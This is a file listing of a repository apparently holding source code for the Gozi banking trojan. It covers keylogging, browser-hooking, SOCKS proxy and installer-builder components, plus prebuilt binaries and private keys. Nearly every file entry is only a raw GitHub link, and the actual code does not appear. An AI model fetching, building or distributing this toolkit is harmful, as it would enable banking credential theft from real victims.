├── AcDll ├── AcDll.vcproj ├── activdll.c ├── activdll.h ├── image.c └── stubs.c ├── BcClient ├── bcclient.c ├── bcclient.h └── bcclient.vcproj ├── Builder ├── FJ.exe ├── Release │ ├── 1000.exe │ ├── client32.dll │ ├── client64.dll │ └── installer.dll ├── build.bat ├── build.txt ├── client32.cfg ├── client64.cfg ├── dll.cfg ├── installer.bat └── installer.cfg ├── Common ├── AMD64 │ └── x64stubs.s ├── Common.h ├── Common.vcproj ├── comsup.c ├── comsup.h ├── crtsup.c ├── crtsup.h ├── cschar.c ├── cschar.h ├── cshash.h ├── dbg.h ├── dllntfy.c ├── dllntfy.h ├── enumdisk.h ├── files.c ├── files.h ├── globals.c ├── globals.h ├── guid.c ├── guid.h ├── hook.c ├── hook.h ├── i386 │ └── w64stubs.asm ├── ini.c ├── ini.h ├── int128.c ├── int128.h ├── joiner.c ├── joiner.h ├── listsup.h ├── logfile.h ├── lsasup.c ├── lsasup.h ├── macros.h ├── main.h ├── memalloc.h ├── pesup.c ├── pesup.h ├── plugin.h ├── priv.c ├── priv.h ├── proc.c ├── proc.h ├── pssup.c ├── pssup.h ├── reg.c ├── reg.h ├── scrshot.cpp ├── scrshot.h ├── str.c ├── str.h ├── stream.h ├── string.c ├── string.h ├── tsocket.h ├── version.h ├── xml.c └── xml.h ├── Config.exe ├── Handle ├── Handle.vcproj ├── handle.c └── handle.h ├── KeyLog ├── KeyLog.vcproj ├── keyhook.c ├── keyhook.h ├── keylog.h ├── keystore.c ├── llhook.c ├── llhook.h ├── logoff.c ├── logoff.h ├── wnd.c └── wnd.h ├── Lib32 ├── BKLib.lib ├── BkInst.lib ├── aplib.lib └── ntdll.lib ├── Lib64 ├── BKLib.lib └── ntdll.lib ├── ReadMe.txt ├── RsaKey ├── ReadMe.txt ├── RsaKey.cpp ├── RsaKey.vcproj └── cschar.c ├── SocksLib ├── proxy.c ├── proxy.h ├── socks.c ├── socks.h ├── socks.vcproj └── sockssrv.h ├── ZipLib ├── ZipLib.vcproj ├── miniz.c ├── miniz.h ├── platform.c ├── platform.h ├── ziplib.c └── ziplib.h ├── apdepack ├── apdepack.vcproj ├── depack.c └── depack.h ├── appack.exe ├── av.c ├── bkinst.h ├── client.ini ├── client ├── avi.h ├── certs.c ├── client.c ├── client.def ├── client.vcproj ├── command.c ├── command.h ├── conf.c ├── conf.h ├── crhook.c ├── cschar.c ├── exhook.c ├── ffhook.c ├── files.c ├── files.h ├── giflib.c ├── giflib.h ├── http.c ├── http.h ├── iehook.c ├── others.c ├── parser.c ├── parser.h ├── pipes.c ├── pipes.h ├── prio.c ├── prio.h ├── ssl.h ├── startup.c ├── transfer.c └── transfer.h ├── config.h ├── config.txt ├── crm.h ├── crm.rc ├── crm.vcproj ├── crm_b.rc ├── crm_dbg.rc ├── crm_u.rc ├── crypto ├── ReadMe.txt ├── aes.c ├── b64.c ├── blowfish.c ├── crypto.c ├── crypto.h ├── crypto.vcproj ├── cryptstr.c ├── des.h ├── des_enc.c ├── des_locl.h ├── deskey.c ├── global.h ├── md5.h ├── md5c.c ├── md5lib.h ├── ncbc_enc.c ├── nn.c ├── nn.h ├── prime.c ├── prime.h ├── r_keygen.c ├── r_random.c ├── r_random.h ├── rc4.c ├── rc4.h ├── rc6.c ├── rc6.h ├── rsa.c ├── rsa.h ├── rsalib.c ├── rsaref.h ├── serpent.c ├── serpent.h ├── sha1.c ├── sign.c └── spr.h ├── cryptor └── CRM.ICO ├── cschar.c ├── desktop.c ├── dll.c ├── dll.def ├── dll.h ├── dll.vcproj ├── dname.txt ├── dname ├── dname.cpp ├── dname.vcproj └── stdafx.h ├── encrypts.bat ├── exe.c ├── format.txt ├── id.h ├── install.c ├── isfb.sln ├── masm64.rules ├── ntdll.h ├── pack_dll.bat ├── pack_exe.bat ├── private.key ├── private.key.txt ├── public.key ├── public.key.txt ├── release(builder) ├── client.dll ├── crm.dll ├── crm.exe ├── dname.exe ├── private.key ├── private.key.txt ├── public.key ├── public.key.txt ├── rsakey.exe └── zconv.exe ├── resource.h ├── testconf.bin ├── testconf.txt ├── upack_dll.bat ├── x64 └── release(builder) │ └── client.dll ├── zconv.txt └── zconv ├── zconv.c └── zconv.vcproj /AcDll/AcDll.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/AcDll/AcDll.vcproj -------------------------------------------------------------------------------- /AcDll/activdll.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/AcDll/activdll.c -------------------------------------------------------------------------------- /AcDll/activdll.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/AcDll/activdll.h -------------------------------------------------------------------------------- /AcDll/image.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/AcDll/image.c -------------------------------------------------------------------------------- /AcDll/stubs.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/AcDll/stubs.c -------------------------------------------------------------------------------- /BcClient/bcclient.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/BcClient/bcclient.c -------------------------------------------------------------------------------- /BcClient/bcclient.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/BcClient/bcclient.h -------------------------------------------------------------------------------- /BcClient/bcclient.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/BcClient/bcclient.vcproj -------------------------------------------------------------------------------- /Builder/FJ.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/FJ.exe -------------------------------------------------------------------------------- /Builder/Release/1000.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/Release/1000.exe -------------------------------------------------------------------------------- /Builder/Release/client32.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/Release/client32.dll -------------------------------------------------------------------------------- /Builder/Release/client64.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/Release/client64.dll -------------------------------------------------------------------------------- /Builder/Release/installer.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/Release/installer.dll -------------------------------------------------------------------------------- /Builder/build.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/build.bat -------------------------------------------------------------------------------- /Builder/build.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/build.txt -------------------------------------------------------------------------------- /Builder/client32.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/client32.cfg -------------------------------------------------------------------------------- /Builder/client64.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/client64.cfg -------------------------------------------------------------------------------- /Builder/dll.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/dll.cfg -------------------------------------------------------------------------------- /Builder/installer.bat: -------------------------------------------------------------------------------- 1 | fj installer.cfg -------------------------------------------------------------------------------- /Builder/installer.cfg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Builder/installer.cfg -------------------------------------------------------------------------------- /Common/AMD64/x64stubs.s: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/AMD64/x64stubs.s -------------------------------------------------------------------------------- /Common/Common.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/Common.h -------------------------------------------------------------------------------- /Common/Common.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/Common.vcproj -------------------------------------------------------------------------------- /Common/comsup.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/comsup.c -------------------------------------------------------------------------------- /Common/comsup.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/comsup.h -------------------------------------------------------------------------------- /Common/crtsup.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/crtsup.c -------------------------------------------------------------------------------- /Common/crtsup.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/crtsup.h -------------------------------------------------------------------------------- /Common/cschar.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/cschar.c -------------------------------------------------------------------------------- /Common/cschar.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/cschar.h -------------------------------------------------------------------------------- /Common/cshash.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/cshash.h -------------------------------------------------------------------------------- /Common/dbg.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/dbg.h -------------------------------------------------------------------------------- /Common/dllntfy.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/dllntfy.c -------------------------------------------------------------------------------- /Common/dllntfy.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/dllntfy.h -------------------------------------------------------------------------------- /Common/enumdisk.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/enumdisk.h -------------------------------------------------------------------------------- /Common/files.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/files.c -------------------------------------------------------------------------------- /Common/files.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/files.h -------------------------------------------------------------------------------- /Common/globals.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/globals.c -------------------------------------------------------------------------------- /Common/globals.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/globals.h -------------------------------------------------------------------------------- /Common/guid.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/guid.c -------------------------------------------------------------------------------- /Common/guid.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/guid.h -------------------------------------------------------------------------------- /Common/hook.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/hook.c -------------------------------------------------------------------------------- /Common/hook.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/hook.h -------------------------------------------------------------------------------- /Common/i386/w64stubs.asm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/i386/w64stubs.asm -------------------------------------------------------------------------------- /Common/ini.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/ini.c -------------------------------------------------------------------------------- /Common/ini.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/ini.h -------------------------------------------------------------------------------- /Common/int128.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/int128.c -------------------------------------------------------------------------------- /Common/int128.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/int128.h -------------------------------------------------------------------------------- /Common/joiner.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/joiner.c -------------------------------------------------------------------------------- /Common/joiner.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/joiner.h -------------------------------------------------------------------------------- /Common/listsup.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/listsup.h -------------------------------------------------------------------------------- /Common/logfile.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/logfile.h -------------------------------------------------------------------------------- /Common/lsasup.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/lsasup.c -------------------------------------------------------------------------------- /Common/lsasup.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/lsasup.h -------------------------------------------------------------------------------- /Common/macros.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/macros.h -------------------------------------------------------------------------------- /Common/main.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/main.h -------------------------------------------------------------------------------- /Common/memalloc.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/memalloc.h -------------------------------------------------------------------------------- /Common/pesup.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/pesup.c -------------------------------------------------------------------------------- /Common/pesup.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/pesup.h -------------------------------------------------------------------------------- /Common/plugin.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/plugin.h -------------------------------------------------------------------------------- /Common/priv.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/priv.c -------------------------------------------------------------------------------- /Common/priv.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/priv.h -------------------------------------------------------------------------------- /Common/proc.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/proc.c -------------------------------------------------------------------------------- /Common/proc.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/proc.h -------------------------------------------------------------------------------- /Common/pssup.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/pssup.c -------------------------------------------------------------------------------- /Common/pssup.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/pssup.h -------------------------------------------------------------------------------- /Common/reg.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/reg.c -------------------------------------------------------------------------------- /Common/reg.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/reg.h -------------------------------------------------------------------------------- /Common/scrshot.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/scrshot.cpp -------------------------------------------------------------------------------- /Common/scrshot.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/scrshot.h -------------------------------------------------------------------------------- /Common/str.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/str.c -------------------------------------------------------------------------------- /Common/str.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/str.h -------------------------------------------------------------------------------- /Common/stream.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/stream.h -------------------------------------------------------------------------------- /Common/string.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/string.c -------------------------------------------------------------------------------- /Common/string.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/string.h -------------------------------------------------------------------------------- /Common/tsocket.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/tsocket.h -------------------------------------------------------------------------------- /Common/version.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/version.h -------------------------------------------------------------------------------- /Common/xml.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/xml.c -------------------------------------------------------------------------------- /Common/xml.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Common/xml.h -------------------------------------------------------------------------------- /Config.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Config.exe -------------------------------------------------------------------------------- /Handle/Handle.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Handle/Handle.vcproj -------------------------------------------------------------------------------- /Handle/handle.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Handle/handle.c -------------------------------------------------------------------------------- /Handle/handle.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Handle/handle.h -------------------------------------------------------------------------------- /KeyLog/KeyLog.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/KeyLog.vcproj -------------------------------------------------------------------------------- /KeyLog/keyhook.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/keyhook.c -------------------------------------------------------------------------------- /KeyLog/keyhook.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/keyhook.h -------------------------------------------------------------------------------- /KeyLog/keylog.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/keylog.h -------------------------------------------------------------------------------- /KeyLog/keystore.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/keystore.c -------------------------------------------------------------------------------- /KeyLog/llhook.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/llhook.c -------------------------------------------------------------------------------- /KeyLog/llhook.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/llhook.h -------------------------------------------------------------------------------- /KeyLog/logoff.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/logoff.c -------------------------------------------------------------------------------- /KeyLog/logoff.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/logoff.h -------------------------------------------------------------------------------- /KeyLog/wnd.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/wnd.c -------------------------------------------------------------------------------- /KeyLog/wnd.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/KeyLog/wnd.h -------------------------------------------------------------------------------- /Lib32/BKLib.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Lib32/BKLib.lib -------------------------------------------------------------------------------- /Lib32/BkInst.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Lib32/BkInst.lib -------------------------------------------------------------------------------- /Lib32/aplib.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Lib32/aplib.lib -------------------------------------------------------------------------------- /Lib32/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Lib32/ntdll.lib -------------------------------------------------------------------------------- /Lib64/BKLib.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Lib64/BKLib.lib -------------------------------------------------------------------------------- /Lib64/ntdll.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/Lib64/ntdll.lib -------------------------------------------------------------------------------- /ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/ReadMe.txt -------------------------------------------------------------------------------- /RsaKey/ReadMe.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/RsaKey/ReadMe.txt -------------------------------------------------------------------------------- /RsaKey/RsaKey.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/RsaKey/RsaKey.cpp -------------------------------------------------------------------------------- /RsaKey/RsaKey.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/RsaKey/RsaKey.vcproj -------------------------------------------------------------------------------- /RsaKey/cschar.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/RsaKey/cschar.c -------------------------------------------------------------------------------- /SocksLib/proxy.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/SocksLib/proxy.c -------------------------------------------------------------------------------- /SocksLib/proxy.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/SocksLib/proxy.h -------------------------------------------------------------------------------- /SocksLib/socks.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/SocksLib/socks.c -------------------------------------------------------------------------------- /SocksLib/socks.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/SocksLib/socks.h -------------------------------------------------------------------------------- /SocksLib/socks.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/SocksLib/socks.vcproj -------------------------------------------------------------------------------- /SocksLib/sockssrv.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/SocksLib/sockssrv.h -------------------------------------------------------------------------------- /ZipLib/ZipLib.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/ZipLib/ZipLib.vcproj -------------------------------------------------------------------------------- /ZipLib/miniz.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/ZipLib/miniz.c -------------------------------------------------------------------------------- /ZipLib/miniz.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/ZipLib/miniz.h -------------------------------------------------------------------------------- /ZipLib/platform.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/ZipLib/platform.c -------------------------------------------------------------------------------- /ZipLib/platform.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/ZipLib/platform.h -------------------------------------------------------------------------------- /ZipLib/ziplib.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/ZipLib/ziplib.c -------------------------------------------------------------------------------- /ZipLib/ziplib.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/ZipLib/ziplib.h -------------------------------------------------------------------------------- /apdepack/apdepack.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/apdepack/apdepack.vcproj -------------------------------------------------------------------------------- /apdepack/depack.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/apdepack/depack.c -------------------------------------------------------------------------------- /apdepack/depack.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/apdepack/depack.h -------------------------------------------------------------------------------- /appack.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/appack.exe -------------------------------------------------------------------------------- /av.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/av.c -------------------------------------------------------------------------------- /bkinst.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/bkinst.h -------------------------------------------------------------------------------- /client.ini: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client.ini -------------------------------------------------------------------------------- /client/avi.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/avi.h -------------------------------------------------------------------------------- /client/certs.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/certs.c -------------------------------------------------------------------------------- /client/client.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/client.c -------------------------------------------------------------------------------- /client/client.def: -------------------------------------------------------------------------------- 1 | LIBRARY "client" 2 | EXPORTS CreateProcessNotify 3 | 4 | -------------------------------------------------------------------------------- /client/client.vcproj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/client.vcproj -------------------------------------------------------------------------------- /client/command.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/command.c -------------------------------------------------------------------------------- /client/command.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/command.h -------------------------------------------------------------------------------- /client/conf.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/conf.c -------------------------------------------------------------------------------- /client/conf.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/conf.h -------------------------------------------------------------------------------- /client/crhook.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/crhook.c -------------------------------------------------------------------------------- /client/cschar.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/cschar.c -------------------------------------------------------------------------------- /client/exhook.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/exhook.c -------------------------------------------------------------------------------- /client/ffhook.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/ffhook.c -------------------------------------------------------------------------------- /client/files.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/files.c -------------------------------------------------------------------------------- /client/files.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/files.h -------------------------------------------------------------------------------- /client/giflib.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/giflib.c -------------------------------------------------------------------------------- /client/giflib.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/giflib.h -------------------------------------------------------------------------------- /client/http.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/http.c -------------------------------------------------------------------------------- /client/http.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/http.h -------------------------------------------------------------------------------- /client/iehook.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/iehook.c -------------------------------------------------------------------------------- /client/others.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/others.c -------------------------------------------------------------------------------- /client/parser.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/parser.c -------------------------------------------------------------------------------- /client/parser.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/parser.h -------------------------------------------------------------------------------- /client/pipes.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/pipes.c -------------------------------------------------------------------------------- /client/pipes.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/pipes.h -------------------------------------------------------------------------------- /client/prio.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/prio.c -------------------------------------------------------------------------------- /client/prio.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/prio.h -------------------------------------------------------------------------------- /client/ssl.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/t3rabyt3-zz/Gozi/HEAD/client/ssl.h -------------------------------------------------------------------------------- /client/startup.c: -------------------------------------------------------------------------------- 